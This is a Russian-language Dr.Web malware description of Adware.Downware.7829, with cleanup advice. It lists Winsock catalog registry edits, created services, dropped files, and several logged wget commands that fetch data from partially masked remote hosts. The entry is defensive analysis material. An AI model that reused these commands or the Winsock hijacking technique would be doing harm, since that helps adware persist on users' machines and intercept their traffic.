Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Adware.Downware.7829

Добавлен в вирусную базу Dr.Web: 2014-08-08

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014] 'PackedCatalogItem' = '{43,3a,5c,57,49,4e,44,4f,57,53,5c,73,79,73,74,65,6d,33,32,5c,57,65,62,44,65,66,65,6e,64,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001] 'PackedCatalogItem' = '{43,3a,5c,57,49,4e,44,4f,57,53,5c,73,79,73,74,65,6d,33,32,5c,57,65,62,44,65,66,65,6e,64,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013] 'PackedCatalogItem' = '{43,3a,5c,57,49,4e,44,4f,57,53,5c,73,79,73,74,65,6d,33,32,5c,57,65,62,44,65,66,65,6e,64,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,6d,73,77,73,6f,63,6b,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012] 'PackedCatalogItem' = '{43,3a,5c,57,49,4e,44,4f,57,53,5c,73,79,73,74,65,6d,33,32,5c,57,65,62,44,65,66,65,6e,64,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,72,73,76,70,73,70,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,72,73,76,70,73,70,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,6d,73,77,73,6f,63,6b,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002] 'PackedCatalogItem' = '{43,3a,5c,57,49,4e,44,4f,57,53,5c,73,79,73,74,65,6d,33,32,5c,57,65,62,44,65,66,65,6e,64,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,6d,73,77,73,6f,63,6b,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,72,73,76,70,73,70,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,72,73,76,70,73,70,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,6d,73,77,73,6f,63,6b,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,6d,73,77,73,6f,63,6b,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,6d,73,77,73,6f,63,6b,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,6d,73,77,73,6f,63,6b,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,6d,73,77,73,6f,63,6b,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,6d,73,77,73,6f,63,6b,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,6d,73,77,73,6f,63,6b,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
  • [<HKLM>\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007] 'PackedCatalogItem' = '{25,53,79,73,74,65,6d,52,6f,6f,74,25,5c,73,79,73,74,65,6d,33,32,5c,6d,73,77,73,6f,63,6b,2e,64,6c,6c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,...'
Создает следующие сервисы:
  • [<HKLM>\SYSTEM\ControlSet001\Services\WS2IFSL] 'Start' = '00000001'
  • [<HKLM>\SYSTEM\ControlSet001\Services\ProtectMonitor] 'Start' = '00000002'
Вредоносные функции:
Создает и запускает на исполнение:
  • '%PROGRAM_FILES%\Web Protect\postcollect.exe' /iid {F23D2C49-2954-49A3-AD3A-AA6AE6D0A93A} /nid adk
  • 'C:\monitor.exe'
  • '%PROGRAM_FILES%\Web Protect\wget.exe' -q -O "tmpfile" "http://tr###.#rkinstall.com/prepost/pre.php?ii#############################################################################################################################################################"
  • '%TEMP%\nsc9.tmp\nsC.tmp' %PROGRAM_FILES%\Web Protect\PCProtect.exe /IsOtherDetails
  • '%TEMP%\nsc9.tmp\nsD.tmp' "%PROGRAM_FILES%\Web Protect\wget.exe" -q -O "tmpfile" "http://tr###.#rkinstall.com/prepost/pre.php?ii#############################################################################################################################################################"
  • '%TEMP%\nsh2.tmp\nsE.tmp' "%PROGRAM_FILES%\Web Protect\wget.exe" -q -O "prov" "http://45###dsfsdfsd/provider.txt"
  • '%TEMP%\nsh2.tmp\ns14.tmp' "%PROGRAM_FILES%\Web Protect\RegisterWebDefend.exe" -b -d WebDefend.dll
  • '%PROGRAM_FILES%\Web Protect\RegisterWebDefend.exe' -b -d WebDefend.dll
  • '%TEMP%\nsh11.tmp\ns13.tmp' systeminfo
  • '%PROGRAM_FILES%\Web Protect\wget.exe' -q -O "prov" "http://45###dsfsdfsd/provider.txt"
  • '%TEMP%\nsh11.tmp\ns12.tmp' sc start "PCProtect"
  • '%TEMP%\nsh2.tmp\ns5.tmp' "%PROGRAM_FILES%\Web Protect\wget.exe" -q -O "jsurl.txt" "http://45###dsfsdfsd/adk/js_url.data"
  • '%PROGRAM_FILES%\Web Protect\wget.exe' -q -O "jsurl.txt" "http://45###dsfsdfsd/adk/js_url.data"
  • '%PROGRAM_FILES%\Web Protect\wget.exe' -q --post-data= -O "tg.txt" "http://34##53dsfds/testGroup.php"
  • '%TEMP%\nsh2.tmp\ns3.tmp' systeminfo
  • '%TEMP%\nsh2.tmp\ns4.tmp' "%PROGRAM_FILES%\Web Protect\wget.exe" -q --post-data= -O "tg.txt" "http://34##53dsfds/testGroup.php"
  • '%TEMP%\nsh2.tmp\ns6.tmp' "%PROGRAM_FILES%\Web Protect\wget.exe" -q -O "idate.txt" "http://34##53dsfds/installdate.php"
  • '%TEMP%\nsc9.tmp\nsA.tmp' %PROGRAM_FILES%\Web Protect\PCProtect.exe /IsInstalled
  • '%TEMP%\nsc9.tmp\nsB.tmp' %PROGRAM_FILES%\Web Protect\PCProtect.exe /IsOtherInstalled
  • '%PROGRAM_FILES%\Web Protect\precollect.exe' /iid {F23D2C49-2954-49A3-AD3A-AA6AE6D0A93A} /nid adk
  • '%PROGRAM_FILES%\Web Protect\wget.exe' -q -O "idate.txt" "http://34##53dsfds/installdate.php"
  • '%TEMP%\nsh2.tmp\ns7.tmp' %PROGRAM_FILES%\Web Protect\precollect.exe /iid {F23D2C49-2954-49A3-AD3A-AA6AE6D0A93A} /nid adk
Запускает на исполнение:
  • '<SYSTEM32>\sc.exe' start "PCProtect"
  • '<SYSTEM32>\systeminfo.exe'
Изменяет следующие настройки браузера Windows Internet Explorer:
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1609' = '00000000'
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1609' = '00000000'
Изменения в файловой системе:
Создает следующие файлы:
  • %TEMP%\nsc9.tmp\nsExec.dll
  • %TEMP%\nsh2.tmp\ns7.tmp
  • %PROGRAM_FILES%\Web Protect\postcollect.exe
  • %TEMP%\nsc9.tmp\nsA.tmp
  • %TEMP%\nsc9.tmp\System.dll
  • %TEMP%\nsc9.tmp\nsC.tmp
  • %TEMP%\nsc9.tmp\nsB.tmp
  • %PROGRAM_FILES%\Web Protect\precollect.exe
  • %PROGRAM_FILES%\Web Protect\ssl3.dll
  • %PROGRAM_FILES%\Web Protect\sqlite3.dll
  • %PROGRAM_FILES%\Web Protect\softokn3.dll
  • %PROGRAM_FILES%\Web Protect\PCProxyDLL.dll
  • %APPDATA%\Mozilla\Firefox\user.js
  • %APPDATA%\Mozilla\Firefox\Profiles\cwdgt0y8.default\user.js
  • %PROGRAM_FILES%\Web Protect\uninstallhelper.exe
  • %TEMP%\nsh11.tmp\ns13.tmp
  • C:\monitorsvc.exe
  • %TEMP%\nsh11.tmp\SimpleSC.dll
  • %TEMP%\nsh2.tmp\ns14.tmp
  • %TEMP%\SpOrder.dll
  • <SYSTEM32>\WebDefend.dll
  • %TEMP%\RegisterWebDefend.ini.log
  • %PROGRAM_FILES%\Web Protect\DirectControl.exe
  • %PROGRAM_FILES%\Web Protect\tmpfile
  • %TEMP%\nsc9.tmp\nsD.tmp
  • %TEMP%\nsc9.tmp\UserInfo.dll
  • C:\monitor.exe
  • %TEMP%\nsh11.tmp\ns12.tmp
  • %TEMP%\nsh11.tmp\nsExec.dll
  • %TEMP%\nsh2.tmp\nsE.tmp
  • %PROGRAM_FILES%\Web Protect\smime3.dll
  • %PROGRAM_FILES%\Web Protect\PCProxy.tlb
  • %PROGRAM_FILES%\Web Protect\PCCertInstaller.dll
  • %TEMP%\nsh2.tmp\fct.dll
  • %PROGRAM_FILES%\Web Protect\RegisterWebDefend.exe
  • %PROGRAM_FILES%\Web Protect\WDCertInstaller.dll
  • %PROGRAM_FILES%\Web Protect\RegisterWebDefend64.exe
  • %PROGRAM_FILES%\Web Protect\RegisterWebDefend.ini
  • %TEMP%\nsh2.tmp\ns6.tmp
  • %TEMP%\nsh2.tmp\nsExec.dll
  • %PROGRAM_FILES%\Web Protect\webprotect.ico
  • %PROGRAM_FILES%\Web Protect\wget.exe
  • %TEMP%\nsh2.tmp\ns3.tmp
  • %TEMP%\nsh2.tmp\ns5.tmp
  • %TEMP%\nsh2.tmp\ns4.tmp
  • %TEMP%\nsh2.tmp\System.dll
  • %PROGRAM_FILES%\Web Protect\nssdbm3.dll
  • %PROGRAM_FILES%\Web Protect\nssckbi.dll
  • %PROGRAM_FILES%\Web Protect\nss3.dll
  • %PROGRAM_FILES%\Web Protect\nssutil3.dll
  • %PROGRAM_FILES%\Web Protect\pcwtc64r.sys
  • %PROGRAM_FILES%\Web Protect\pcwtc64f.sys
  • %PROGRAM_FILES%\Web Protect\pcwatch.sys
  • %PROGRAM_FILES%\Web Protect\libplds4.dll
  • %PROGRAM_FILES%\Web Protect\WebDefend.tlb
  • %PROGRAM_FILES%\Web Protect\WebDefend.exe
  • %PROGRAM_FILES%\Web Protect\WebDefend.dll
  • %PROGRAM_FILES%\Web Protect\WebDefend64.dll
  • %PROGRAM_FILES%\Web Protect\libplc4.dll
  • %PROGRAM_FILES%\Web Protect\libnspr4.dll
  • %PROGRAM_FILES%\Web Protect\freebl3.dll
Удаляет следующие файлы:
  • %TEMP%\nsc9.tmp\System.dll
  • %TEMP%\nsc9.tmp\UserInfo.dll
  • %PROGRAM_FILES%\Web Protect\tmpfile
  • %TEMP%\nsc9.tmp\nsExec.dll
  • %TEMP%\nsh11.tmp\ns12.tmp
  • %PROGRAM_FILES%\Web Protect\pcwatch.sys.win7
  • %TEMP%\nsh2.tmp\ns7.tmp
  • %TEMP%\nsh2.tmp\nsE.tmp
  • %TEMP%\nsh2.tmp\ns5.tmp
  • %TEMP%\nsh2.tmp\ns6.tmp
  • %TEMP%\nsh2.tmp\ns3.tmp
  • %TEMP%\nsh2.tmp\ns4.tmp
  • %TEMP%\nsc9.tmp\nsC.tmp
  • %TEMP%\nsc9.tmp\nsD.tmp
  • %TEMP%\nsc9.tmp\nsA.tmp
  • %TEMP%\nsc9.tmp\nsB.tmp
Сетевая активность:
Подключается к:
  • 'tr###.#rkinstall.com':80
TCP:
Запросы HTTP GET:
  • tr###.#rkinstall.com/prepost/pre.php?ii#################################################################################################################################################################
UDP:
  • DNS ASK tr###.#rkinstall.com

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке